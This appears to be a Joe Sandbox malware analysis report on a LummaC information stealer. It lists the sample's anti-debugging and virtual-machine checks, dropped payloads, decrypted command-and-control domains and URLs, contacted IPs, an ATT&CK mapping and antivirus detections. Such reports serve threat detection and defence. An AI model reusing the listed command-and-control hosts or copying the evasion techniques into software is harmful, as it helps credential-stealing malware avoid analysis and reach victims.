Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E067 second address: 123E086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F66E96D98E8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E086 second address: 123E0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F66E8B84A85h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E0A1 second address: 123E0A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 123E1FB second address: 123E1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1241D10 second address: 1241D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 12417C4 second address: 12417CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 12417CA second address: 12417DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E96D98DBh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1242E70 second address: 1242E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1241926 second address: 1241944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1241944 second address: 124194C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 124194C second address: 1241950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Special instruction interceptor: First address: FBDC2C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Special instruction interceptor: First address: FBDB31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Special instruction interceptor: First address: 1179FAA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Special instruction interceptor: First address: 116545E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Memory allocated: 5960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Memory allocated: 5BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Memory allocated: 59E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe TID: 3120

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Cph7VEeu1r.exe, Cph7VEeu1r.exe, 00000000.00000002.1478768325.0000000001136000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Cph7VEeu1r.exe, 00000000.00000003.1437130428.0000000005770000.00000004.00001000.00020000.00000000.sdmp, Cph7VEeu1r.exe, 00000000.00000002.1478111913.00000000008E2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: Cph7VEeu1r.exe, 00000000.00000002.1478111913.00000000008E2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Set-up.exe, 00000003.00000003.1477505185.0000000000985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWWl
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Cph7VEeu1r.exe, Cph7VEeu1r.exe, 00000000.00000003.1437130428.0000000005770000.00000004.00001000.00020000.00000000.sdmp, Cph7VEeu1r.exe, 00000000.00000002.1478111913.00000000008E2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcICQ
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.1477779029.00000000003B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Cph7VEeu1r.exe, 00000000.00000002.1478768325.0000000001136000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_2-12692

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File opened: NTICE
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File opened: SICE
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_0048BAD0 LdrInitializeThunk,

2_2_0048BAD0

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: Cph7VEeu1r.exe, 00000000.00000002.1481731291.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: Cph7VEeu1r.exe, Cph7VEeu1r.exe, 00000000.00000002.1478768325.0000000001136000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =Program Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.8:49706 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Cph7VEeu1r.exe	58%	ReversingLabs	Win32.Spyware.Lummastealer
Cph7VEeu1r.exe	100%	Avira	HEUR/AGEN.1313526
Cph7VEeu1r.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	37%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=00ll	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100034fd4	0%	Avira URL Cloud	safe
censeractersj.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	false		high
httpbin.org	3.218.7.103	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: safe	unknown
wordyfindy.lat	false		high
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
bashfulacid.lat	false		high
manyrestro.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: safe	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://html4/loose.dtd	Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=00ll	Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/ipbefore	Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.1657808349.0000000000F99000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100034fd4	Set-up.exe, 00000003.00000003.1656664200.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656274991.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1657354944.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656468531.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.1656220925.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	false
3.218.7.103	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581230
Start date and time:	2024-12-27 08:52:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Cph7VEeu1r.exe renamed because original name is a hash value
Original Sample Name:	02e25b261f1a228df152eef5977c625c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Cph7VEeu1r.exe, PID 908 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 6108 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Cph7VEeu1r.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twentytk20ht.top/v1/upload.php
	x6Rd1DzUJA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
3.218.7.103	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
